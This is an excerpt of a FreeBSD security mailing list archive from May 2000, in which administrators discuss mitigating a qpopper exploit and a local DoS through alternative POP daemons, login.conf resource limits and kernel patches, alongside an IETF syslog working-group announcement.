[196.31.225.2]) by hub.freebsd.org (Postfix) with ESMTP id CD35B37B729 for ; Tue, 30 May 2000 04:07:26 -0700 (PDT) (envelope-from tim@polytechnic.edu.na) Received: from [196.31.225.199] (helo=polytechnic.edu.na) by mail.polytechnic.edu.na with esmtp (Exim 3.02 #2) id 12wlkl-0000eP-00; Tue, 30 May 2000 11:08:15 -0200 Message-ID: <3933A0D8.5BDAA415@polytechnic.edu.na> Date: Tue, 30 May 2000 12:07:04 +0100 From: Tim Priebe Reply-To: tim@iafrica.com.na X-Mailer: Mozilla 4.7 [en] (X11; I; FreeBSD 3.4-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: sen_ml@eccosys.com Cc: freebsd-security@FreeBSD.ORG Subject: Re: QPOPPER: Remote gid mail exploit References: <20000530165232H.1001@eccosys.com> <20000530180805Y.1001@eccosys.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org sen_ml@eccosys.com wrote: > p.s. i started to wonder about whether there were any decent > alternative pop daemons. anyone have any suggestions? i'd have > switched to the pop daemon that comes w/ qmail but i don't want to > convert to Maildir just yet. Check cucipop in ports, the only problem I have had with it is that it seems to consistantly report that it is going to send 9 more bytes than it actually does. It is also less resource intensive than qpopper. Tim. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 30 6:19:26 2000 Delivered-To: freebsd-security@freebsd.org Received: from naughty.monkey.org (naughty.monkey.org [63.77.239.20]) by hub.freebsd.org (Postfix) with ESMTP id BDEB737BDAC for ; Tue, 30 May 2000 06:19:23 -0700 (PDT) (envelope-from dugsong@monkey.org) Received: by naughty.monkey.org (Postfix, from userid 1001) id 5638A1086A4; Tue, 30 May 2000 09:19:21 -0400 (EDT) Received: from localhost (localhost [127.0.0.1]) by naughty.monkey.org (Postfix) with ESMTP id 4F64110773E for ; Tue, 30 May 2000 09:19:21 -0400 (EDT) Date: Tue, 30 May 2000 09:19:21 -0400 (EDT) From: Dug Song To: freebsd-security@FreeBSD.ORG Subject: Re: QPOPPER: Remote gid mail exploit In-Reply-To: <20000530180805Y.1001@eccosys.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 30 May 2000 sen_ml@eccosys.com wrote: > p.s. i started to wonder about whether there were any decent > alternative pop daemons. anyone have any suggestions? Solar Designer's popa3d is quite nice. http://www.openwall.com/popa3d/ -d. --- http://www.monkey.org/~dugsong/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 30 10:11:43 2000 Delivered-To: freebsd-security@freebsd.org Received: from fw.wintelcom.net (ns1.wintelcom.net [209.1.153.20]) by hub.freebsd.org (Postfix) with ESMTP id 8FE5A37BE2D for ; Tue, 30 May 2000 10:11:37 -0700 (PDT) (envelope-from bright@fw.wintelcom.net) Received: (from bright@localhost) by fw.wintelcom.net (8.10.0/8.10.0) id e4UHkWg24963; Tue, 30 May 2000 10:46:32 -0700 (PDT) Date: Tue, 30 May 2000 10:46:32 -0700 From: Alfred Perlstein To: Justin Stanford Cc: freebsd-security@FreeBSD.ORG Subject: Re: Local FreeBSD, OpenBSD, NetBSD, DoS Vulnerability (fwd) Message-ID: <20000530104632.A9283@fw.wintelcom.net> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2i In-Reply-To: ; from jus@security.za.net on Tue, May 30, 2000 at 10:39:51AM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org * Justin Stanford [000530 02:18] wrote: > Tested aswell on 3.4-STABLE and 4.0-STABLE - it works. *sigh* please see 'man limit' on 4.0. thanks, -Alfred To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 30 10:27:12 2000 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id A7CDA37BE87 for ; Tue, 30 May 2000 10:27:04 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.3/8.9.3) id NAA25833; Tue, 30 May 2000 13:26:56 -0400 (EDT) (envelope-from wollman) Date: Tue, 30 May 2000 13:26:56 -0400 (EDT) From: Garrett Wollman Message-Id: <200005301726.NAA25833@khavrinen.lcs.mit.edu> To: Alfred Perlstein Cc: freebsd-security@FreeBSD.ORG Subject: Re: Local FreeBSD, OpenBSD, NetBSD, DoS Vulnerability (fwd) In-Reply-To: <20000530104632.A9283@fw.wintelcom.net> References: <20000530104632.A9283@fw.wintelcom.net> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org < said: > *sigh* please see 'man limit' on 4.0. ITYM ``see `man setrlimit' with special attention to RLIMIT_SBSIZE''. `man limit' doesn't provide any useful information at all. -GAWollman -- Garrett A. Wollman | O Siem / We are all family / O Siem / We're all the same wollman@lcs.mit.edu | O Siem / The fires of freedom Opinions not those of| Dance in the burning flame MIT, LCS, CRS, or NSA| - Susan Aglukark and Chad Irschick To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 30 21:31:49 2000 Delivered-To: freebsd-security@freebsd.org Received: from alexander.pentalpha.com.hk (alexander.pentalpha.com.hk [210.176.109.1]) by hub.freebsd.org (Postfix) with ESMTP id BC52937B7C1; Tue, 30 May 2000 21:31:38 -0700 (PDT) (envelope-from danny@pentalpha.com.hk) Received: (from uucp@localhost) by alexander.pentalpha.com.hk (8.9.3/8.9.3) id MAA74818; Wed, 31 May 2000 12:31:33 +0800 (CST) (envelope-from danny@pentalpha.com.hk) Received: from 001.mis.pentalpha.com.hk(10.0.0.168), claiming to be "001.mis.penatlpha.com.hk" via SMTP by alexander.pentalpha.com.hk, id smtpdW74816; Wed May 31 12:31:32 2000 Message-ID: <01bb01bfcab9$191f37a0$a800000a@001.mis.penatlpha.com.hk> From: "Danny Wong" To: , Subject: process eat up all me process time Date: Wed, 31 May 2000 12:31:32 +0800 MIME-Version: 1.0 Content-Type: text/plain; charset="big5" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 4.72.2106.4 X-MimeOLE: Produced By Microsoft MimeOLE V4.72.2106.4 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi! I need to login some remote site and do some editing on the configure file. As the connection is not very stable, sometime I lose the connect while doing file editing. A few days after, I login again and find that about 98% of CPU time is occupied by 'ee' - process running while lose connect a few days ago. Also the connect supposed to be dead are still exist and running, e.g csh, ee .... I am running on FreeBSD 3.2 - stable. Can it be used to created a DoS attack? Thanks! Danny To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 30 22:36:44 2000 Delivered-To: freebsd-security@freebsd.org Received: from fw.wintelcom.net (ns1.wintelcom.net [209.1.153.20]) by hub.freebsd.org (Postfix) with ESMTP id 1461237B655; Tue, 30 May 2000 22:36:39 -0700 (PDT) (envelope-from bright@fw.wintelcom.net) Received: (from bright@localhost) by fw.wintelcom.net (8.10.0/8.10.0) id e4V5aVY16924; Tue, 30 May 2000 22:36:31 -0700 (PDT) Date: Tue, 30 May 2000 22:36:31 -0700 From: Alfred Perlstein To: Danny Wong Cc: freebsd-questions@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: process eat up all me process time Message-ID: <20000530223631.I9283@fw.wintelcom.net> References: <01bb01bfcab9$191f37a0$a800000a@001.mis.penatlpha.com.hk> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2i In-Reply-To: <01bb01bfcab9$191f37a0$a800000a@001.mis.penatlpha.com.hk>; from danny@pentalpha.com.hk on Wed, May 31, 2000 at 12:31:32PM +0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org * Danny Wong [000530 21:35] wrote: > Hi! > I need to login some remote site and do some editing on the configure file. > As the connection is not very stable, sometime I lose the connect while > doing file editing. A few days after, I login again and find that about 98% > of CPU time is occupied by 'ee' - process running while lose connect a few > days ago. Also the connect supposed to be dead are still exist and running, > e.g csh, ee .... > I am running on FreeBSD 3.2 - stable. I'm pretty sure a fix was put in after for 3-stable, i'd upgrade if possible. > Can it be used to created a DoS attack? A pretty sad one maybe. :) -- -Alfred Perlstein - [bright@wintelcom.net|alfred@freebsd.org] "I have the heart of a child; I keep it in a jar on my desk." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 30 23: 7:37 2000 Delivered-To: freebsd-security@freebsd.org Received: from epsilon.lucida.qc.ca (epsilon.lucida.qc.ca [216.95.146.6]) by hub.freebsd.org (Postfix) with SMTP id 69A5737B74A for ; Tue, 30 May 2000 23:07:32 -0700 (PDT) (envelope-from matt@ARPA.MAIL.NET) Received: (qmail 6260 invoked by uid 1000); 31 May 2000 06:07:30 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 31 May 2000 06:07:30 -0000 Date: Wed, 31 May 2000 02:07:26 -0400 (EDT) From: Matt Heckaman X-Sender: matt@epsilon.lucida.qc.ca To: Garrett Wollman Cc: FreeBSD-SECURITY Subject: Re: Local FreeBSD, OpenBSD, NetBSD, DoS Vulnerability (fwd) In-Reply-To: <200005301726.NAA25833@khavrinen.lcs.mit.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-Spam-Rating: localhost 1.6.2 0/1000/N Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Tue, 30 May 2000, Garrett Wollman wrote: [...] : ITYM ``see `man setrlimit' with special attention to RLIMIT_SBSIZE''. : `man limit' doesn't provide any useful information at all. Yes, I see what you mean and understand RLIMIT_SBSIZE, but just how is that set on a machine wide-all-users scale? From what I can tell from login.conf(5) there's no resource for it. RESOURCE LIMITS Name Type Notes Description cputime time CPU usage limit. filesize size Maximum file size limit. datasize size Maximum data size limit. stacksize size Maximum stack size limit. coredumpsize size Maximum coredump size limit. memoryuse size Maximum of core memory use size limit. memorylocked size Maximum locked in core memory size limit. maxproc number Maximum number of processes. openfiles number Maximum number of open files per process. ... Is the manual page out of date and it's there, or is it not? : -GAWollman Regards, Matt Heckaman matt@arpa.mail.net http://www.lucida.qc.ca -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.1 (FreeBSD) Comment: http://www.lucida.qc.ca/pgp iD8DBQE5NKwhdMMtMcA1U5ARAtwXAKCT2rzDFZarF5iRGncwGsKndynDuQCffCCr ZDezQTQZA5tHSuhth27SeCw= =jCrD -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 30 23:13:25 2000 Delivered-To: freebsd-security@freebsd.org Received: from Athena.za.net (athena.za.net [196.30.167.200]) by hub.freebsd.org (Postfix) with ESMTP id 2045837B7F3 for ; Tue, 30 May 2000 23:13:18 -0700 (PDT) (envelope-from jus@security.za.net) Received: from localhost (jus@localhost) by Athena.za.net (8.9.3/8.9.3) with ESMTP id IAA00404; Wed, 31 May 2000 08:11:46 +0200 (SAST) (envelope-from jus@security.za.net) X-Authentication-Warning: Athena.za.net: jus owned process doing -bs Date: Wed, 31 May 2000 08:10:31 +0200 (SAST) From: Justin Stanford X-Sender: jus@Athena.za.net To: Matt Heckaman Cc: Garrett Wollman , FreeBSD-SECURITY Subject: Re: Local FreeBSD, OpenBSD, NetBSD, DoS Vulnerability (fwd) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Take a look at the sample login.conf entry on http://www.security.za.net (News Section) - this has proven to prevent the DoS from working. Regards, jus -- Justin Stanford 082 7402741 jus@security.za.net www.security.za.net IT Security and Solutions On Wed, 31 May 2000, Matt Heckaman wrote: > On Tue, 30 May 2000, Garrett Wollman wrote: > [...] > : ITYM ``see `man setrlimit' with special attention to RLIMIT_SBSIZE''. > : `man limit' doesn't provide any useful information at all. > > Yes, I see what you mean and understand RLIMIT_SBSIZE, but just how is > that set on a machine wide-all-users scale? From what I can tell from > login.conf(5) there's no resource for it. > > RESOURCE LIMITS > Name Type Notes Description > cputime time CPU usage limit. > filesize size Maximum file size limit. > datasize size Maximum data size limit. > stacksize size Maximum stack size limit. > coredumpsize size Maximum coredump size limit. > memoryuse size Maximum of core memory use size > limit. > memorylocked size Maximum locked in core memory size > limit. > maxproc number Maximum number of processes. > openfiles number Maximum number of open files per > process. > ... > > Is the manual page out of date and it's there, or is it not? > > : -GAWollman > > Regards, > Matt Heckaman > matt@arpa.mail.net > http://www.lucida.qc.ca > ------------ Output from pgp ------------ > Opening file "/home/jus/pgp4pine.tmp" type text. > Signature by unknown keyid: 0xC0355390 > Opening file "/dev/null" type text. > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 30 23:16: 3 2000 Delivered-To: freebsd-security@freebsd.org Received: from fusion.unixfreak.org (cx272244-a.orng1.occa.home.com [24.1.177.149]) by hub.freebsd.org (Postfix) with ESMTP id 0C98637B837 for ; Tue, 30 May 2000 23:15:57 -0700 (PDT) (envelope-from bhishan@fusion.unixfreak.org) Received: (from bhishan@localhost) by fusion.unixfreak.org (8.10.1/8.9.3) id e4V6Our01501; Tue, 30 May 2000 23:24:56 -0700 (PDT) (envelope-from bhishan) From: Bhishan Hemrajani Message-Id: <200005310624.e4V6Our01501@fusion.unixfreak.org> Subject: Re: Local FreeBSD, OpenBSD, NetBSD, DoS Vulnerability (fwd) In-Reply-To: from Justin Stanford at "May 31, 2000 08:10:31 am" To: Justin Stanford Date: Tue, 30 May 2000 23:24:56 -0700 (PDT) Cc: Matt Heckaman , Garrett Wollman , FreeBSD-SECURITY X-Mailer: ELM [version 2.4ME+ PL61 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Is there a patch for 3.4-STABLE users so that the limits can be applied? I have been informed of one located at: http://people.freebsd.org/~green/sbsize2.patch However, it is not functional at this moment. Thank you. --bhishan > Take a look at the sample login.conf entry on http://www.security.za.net > (News Section) - this has proven to prevent the DoS from working. > > Regards, > jus > > -- > Justin Stanford > 082 7402741 > jus@security.za.net > www.security.za.net > IT Security and Solutions > > > On Wed, 31 May 2000, Matt Heckaman wrote: > > > On Tue, 30 May 2000, Garrett Wollman wrote: > > [...] > > : ITYM ``see `man setrlimit' with special attention to RLIMIT_SBSIZE''. > > : `man limit' doesn't provide any useful information at all. > > > > Yes, I see what you mean and understand RLIMIT_SBSIZE, but just how is > > that set on a machine wide-all-users scale? From what I can tell from > > login.conf(5) there's no resource for it. > > > > RESOURCE LIMITS > > Name Type Notes Description > > cputime time CPU usage limit. > > filesize size Maximum file size limit. > > datasize size Maximum data size limit. > > stacksize size Maximum stack size limit. > > coredumpsize size Maximum coredump size limit. > > memoryuse size Maximum of core memory use size > > limit. > > memorylocked size Maximum locked in core memory size > > limit. > > maxproc number Maximum number of processes. > > openfiles number Maximum number of open files per > > process. > > ... > > > > Is the manual page out of date and it's there, or is it not? > > > > : -GAWollman > > > > Regards, > > Matt Heckaman > > matt@arpa.mail.net > > http://www.lucida.qc.ca > > ------------ Output from pgp ------------ > > Opening file "/home/jus/pgp4pine.tmp" type text. > > Signature by unknown keyid: 0xC0355390 > > Opening file "/dev/null" type text. > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -- Bhishan Hemrajani / bhishan@fusion.unixfreak.org / PGP: 0xFAC75561 Finger bhishan@fusion.unixfreak.org for more information. The difference between us and a computer is that, the computer is blindingly stupid, but it is capable of being stupid many, many million times a second. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 30 23:19:49 2000 Delivered-To: freebsd-security@freebsd.org Received: from Athena.za.net (athena.za.net [196.30.167.200]) by hub.freebsd.org (Postfix) with ESMTP id 01FF337B833 for ; Tue, 30 May 2000 23:19:42 -0700 (PDT) (envelope-from jus@security.za.net) Received: from localhost (jus@localhost) by Athena.za.net (8.9.3/8.9.3) with ESMTP id IAA00427; Wed, 31 May 2000 08:18:20 +0200 (SAST) (envelope-from jus@security.za.net) X-Authentication-Warning: Athena.za.net: jus owned process doing -bs Date: Wed, 31 May 2000 08:18:19 +0200 (SAST) From: Justin Stanford X-Sender: jus@Athena.za.net To: Bhishan Hemrajani Cc: Matt Heckaman , Garrett Wollman , FreeBSD-SECURITY Subject: Re: Local FreeBSD, OpenBSD, NetBSD, DoS Vulnerability (fwd) In-Reply-To: <200005310624.e4V6Our01501@fusion.unixfreak.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org That sample login.conf was taken from a 3.4-STABLE machine - it should work fine all round. -- Justin Stanford 082 7402741 jus@security.za.net www.security.za.net IT Security and Solutions On Tue, 30 May 2000, Bhishan Hemrajani wrote: > Is there a patch for 3.4-STABLE users so that the limits can be applied? > > I have been informed of one located at: > http://people.freebsd.org/~green/sbsize2.patch > > However, it is not functional at this moment. > > Thank you. > > --bhishan > > > Take a look at the sample login.conf entry on http://www.security.za.net > > (News Section) - this has proven to prevent the DoS from working. > > > > Regards, > > jus > > > > -- > > Justin Stanford > > 082 7402741 > > jus@security.za.net > > www.security.za.net > > IT Security and Solutions > > > > > > On Wed, 31 May 2000, Matt Heckaman wrote: > > > > > On Tue, 30 May 2000, Garrett Wollman wrote: > > > [...] > > > : ITYM ``see `man setrlimit' with special attention to RLIMIT_SBSIZE''. > > > : `man limit' doesn't provide any useful information at all. > > > > > > Yes, I see what you mean and understand RLIMIT_SBSIZE, but just how is > > > that set on a machine wide-all-users scale? From what I can tell from > > > login.conf(5) there's no resource for it. > > > > > > RESOURCE LIMITS > > > Name Type Notes Description > > > cputime time CPU usage limit. > > > filesize size Maximum file size limit. > > > datasize size Maximum data size limit. > > > stacksize size Maximum stack size limit. > > > coredumpsize size Maximum coredump size limit. > > > memoryuse size Maximum of core memory use size > > > limit. > > > memorylocked size Maximum locked in core memory size > > > limit. > > > maxproc number Maximum number of processes. > > > openfiles number Maximum number of open files per > > > process. > > > ... > > > > > > Is the manual page out of date and it's there, or is it not? > > > > > > : -GAWollman > > > > > > Regards, > > > Matt Heckaman > > > matt@arpa.mail.net > > > http://www.lucida.qc.ca > > > ------------ Output from pgp ------------ > > > Opening file "/home/jus/pgp4pine.tmp" type text. > > > Signature by unknown keyid: 0xC0355390 > > > Opening file "/dev/null" type text. > > > > > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > > -- > Bhishan Hemrajani / bhishan@fusion.unixfreak.org / PGP: 0xFAC75561 > Finger bhishan@fusion.unixfreak.org for more information. > > The difference between us and a computer is that, the computer is blindingly > stupid, but it is capable of being stupid many, many million times a second. > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 30 23:20:25 2000 Delivered-To: freebsd-security@freebsd.org Received: from epsilon.lucida.qc.ca (epsilon.lucida.qc.ca [216.95.146.6]) by hub.freebsd.org (Postfix) with SMTP id F25BF37BE6C for ; Tue, 30 May 2000 23:20:21 -0700 (PDT) (envelope-from matt@ARPA.MAIL.NET) Received: (qmail 6347 invoked by uid 1000); 31 May 2000 06:20:21 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 31 May 2000 06:20:21 -0000 Date: Wed, 31 May 2000 02:20:18 -0400 (EDT) From: Matt Heckaman X-Sender: matt@epsilon.lucida.qc.ca To: Justin Stanford Cc: FreeBSD-SECURITY Subject: Re: Local FreeBSD, OpenBSD, NetBSD, DoS Vulnerability (fwd) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-Spam-Rating: localhost 1.6.2 0/1000/N Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Wed, 31 May 2000, Justin Stanford wrote: ... : Take a look at the sample login.conf entry on http://www.security.za.net : (News Section) - this has proven to prevent the DoS from working. Which part of it hmm. My evaluation of it would be the openfile limit, in that they cannot open up enough descriptors to successfully harm the box. Time for me me to go play with login.conf some more, thanks. The question still remains though, can you set RLIMIT_SBSIZE and RLIMIT_RSS with the login.conf? Both would be very useful to me :) : Regards, : jus Matt Heckaman matt@arpa.mail.net http://www.lucida.qc.ca -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.1 (FreeBSD) Comment: http://www.lucida.qc.ca/pgp iD8DBQE5NK8ldMMtMcA1U5ARAmO2AJ4uiEPIHcMQazamUS2M8xvbiZOBtACbB4sF CpfXTAfbwJZTFYrzG/ceNRo= =buS0 -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 30 23:21:51 2000 Delivered-To: freebsd-security@freebsd.org Received: from silby.com (cb34181-a.mdsn1.wi.home.com [24.14.173.39]) by hub.freebsd.org (Postfix) with SMTP id 2F4C037BDA6 for ; Tue, 30 May 2000 23:21:45 -0700 (PDT) (envelope-from silby@silby.com) Received: (qmail 45620 invoked by uid 1000); 31 May 2000 06:21:44 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 31 May 2000 06:21:44 -0000 Date: Wed, 31 May 2000 01:21:44 -0500 (CDT) From: Mike Silbersack To: Bhishan Hemrajani Cc: Justin Stanford , Matt Heckaman , Garrett Wollman , FreeBSD-SECURITY Subject: Re: Local FreeBSD, OpenBSD, NetBSD, DoS Vulnerability (fwd) In-Reply-To: <200005310624.e4V6Our01501@fusion.unixfreak.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In addition to looking at that, you might want to apply my backport of the mbuf waiting code so the box doesn't panic; the code is solid, but as I found another leak while testing, I haven't pushed to get it committed yet. (The leak occurs in 4 as well, so it's no reason to trust the patch less.) You can grab it from http://www.silby.com/patches/ EVERYONE running a 3.4 box is welcome to test the patch. Mike "Silby" Silbersack On Tue, 30 May 2000, Bhishan Hemrajani wrote: > Is there a patch for 3.4-STABLE users so that the limits can be applied? > > I have been informed of one located at: > http://people.freebsd.org/~green/sbsize2.patch > > However, it is not functional at this moment. > > Thank you. > > --bhishan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 31 8:11:52 2000 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id 80A5837B593 for ; Wed, 31 May 2000 08:11:47 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.3/8.9.3) id LAA33903; Wed, 31 May 2000 11:11:43 -0400 (EDT) (envelope-from wollman) Date: Wed, 31 May 2000 11:11:43 -0400 (EDT) From: Garrett Wollman Message-Id: <200005311511.LAA33903@khavrinen.lcs.mit.edu> To: security@FreeBSD.org Subject: [The IESG: WG ACTION: Security Issues in Network Ev] Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org ------- start of forwarded message (RFC 934 encapsulation) ------- Message-Id: <200005311105.HAA03289@ietf.org> From: The IESG Sender: scoya@cnri.reston.va.us To: IETF-Announce: ; Subject: WG ACTION: Security Issues in Network Event Logging (syslog) Date: Wed, 31 May 2000 07:05:06 -0400 A new working group has been formed in the Security Area of the IETF. For additional information, contact the Area Directors or the WG Chair. Security Issues in Network Event Logging (syslog) - ------------------------------------------------- Current Status: Active Working Group Chair(s): Chris Lonvick Security Area Director(s): Jeffrey Schiller Marcus Leech Security Area Advisor: Jeffrey Schiller Mailing Lists: General Discussion:syslog-sec@employees.org To Subscribe: majordomo@employees.org In Body: subscribe syslog-sec your_email_address Archive: http://www.mail-archive.com/syslog-sec@employees.org/ Description of Working Group: Syslog is a de-facto standard for logging system events. However, the protocol component of this event logging system has not been formally documented. While the protocol has been very useful and scalable, it has some known but undocumented security problems. For instance, the messages are unauthenticated and there is no mechanism to provide verified delivery and message integrity. The goal of this working group is to document and address the security and integrity problems of the existing Syslog mechanism. In order to accomplish this task we will document the existing protocol. The working group will also explore and develop a standard to address the security problems. Beyond documenting the Syslog protocol and its problems, the working group will work on ways to secure the Syslog protocol. At a minimum this group will address providing authenticity, integrity and confidentiality of Syslog messages as they traverse the network. The belief being that we can provide mechanisms that can be utilized in existing programs with few modifications to the protocol while providing significant security enhancements. Goals and Milestones: May 00 Post as an Internet Draft the observed behavior of the Syslog protocol for consideration as an Informational Document. Jun 00 Submit Syslog protocol document to IESG for consideration as an INFORMATIONAL RFC. Jul 00 Post as an Internet Draft the specification for an authenticated Syslog for consideration as a Standards Track RFC. Aug 00 Submit Syslog Authentication Protocol to IESG for consideration as a PROPOSED STANDARD. Sep 00 Post an Internet Draft describing enhancements to the Syslog authentication protocol to add verification of delivery and other security services. Oct 00 Submit Syslog Authentication Protocol Enhancement to IESG for consideration as a PROPOSED STANDARD. Dec 00 Revise drafts as necessary to advance these Internet-Drafts to Standards Track RFCs. ------- end ------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 31 9:38:56 2000 Delivered-To: freebsd-security@freebsd.org Received: from falla.videotron.net (falla.videotron.net [205.151.222.106]) by hub.freebsd.org (Postfix) with ESMTP id 6878737BDE7 for ; Wed, 31 May 2000 09:38:51 -0700 (PDT) (envelope-from bmilekic@dsuper.net) Received: from modemcable009.62-201-24.mtl.mc.videotron.net ([24.201.62.9]) by falla.videotron.net (Sun Internet Mail Server sims.3.5.1999.12.14.10.29.p8) with ESMTP id <0FVF00ASVNEWBJ@falla.videotron.net> for freebsd-security@FreeBSD.ORG; Wed, 31 May 2000 12:35:20 -0400 (EDT) Date: Wed, 31 May 2000 12:36:47 -0400 (EDT) From: Bosko Milekic Subject: Re: Local FreeBSD, OpenBSD, NetBSD, DoS Vulnerability (fwd) In-reply-to: X-Sender: bmilekic@jehovah.technokratis.com To: Mike Silbersack Cc: FreeBSD-SECURITY Message-id: MIME-version: 1.0 Content-type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 31 May 2000, Mike Silbersack wrote: > EVERYONE running a 3.4 box is welcome to test the patch. > > Mike "Silby" Silbersack I don't have a 3.4 machine up right now, but you should check to make sure that all callers to m_get and MGET actually check their return values, even if the call goes in with M_WAIT. I remember seeing some places in the code where callers with M_WAIT automatically assumed that they would be getting an mbuf, which probably has to do with the old behavior of mbufs being allocated with malloc(). I think green mentionned this to me, although I remember fixing a few of them with the initial 4.x patch. -- Bosko Milekic bmilekic@technokratis.com WWW: http://www.technokratis.com/ Voice/Mobile: 514.865.7738 * Pager: 514.921.0237 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 31 10:29:36 2000 Delivered-To: freebsd-security@freebsd.org Received: from larryboy.graphics.cornell.edu (larryboy.graphics.cornell.edu [128.84.247.48]) by hub.freebsd.org (Postfix) with ESMTP id 1EDD137BE0B for ; Wed, 31 May 2000 10:29:32 -0700 (PDT) (envelope-from mkc@larryboy.graphics.cornell.edu) Received: from larryboy.graphics.cornell.edu (mkc@localhost) by larryboy.graphics.cornell.edu (8.9.3/8.9.3) with ESMTP id NAA17118; Wed, 31 May 2000 13:29:29 -0400 (EDT) (envelope-from mkc@larryboy.graphics.cornell.edu) Message-Id: <200005311729.NAA17118@larryboy.graphics.cornell.edu> To: freebsd-security@freebsd.org Cc: mkc@larryboy.graphics.cornell.edu Subject: icmp-response bandwidth limit Date: Wed, 31 May 2000 13:29:29 -0400 From: Mitch Collinsworth Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Ok, my fileserver just logged this: May 31 01:03:56 [hostname] /kernel: icmp-response bandwidth limit 602/100 pps Where do I find more details about what this means? -Mitch To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 31 10:45:16 2000 Delivered-To: freebsd-security@freebsd.org Received: from shell.telemere.net (shell.telemere.net [63.224.9.3]) by hub.freebsd.org (Postfix) with 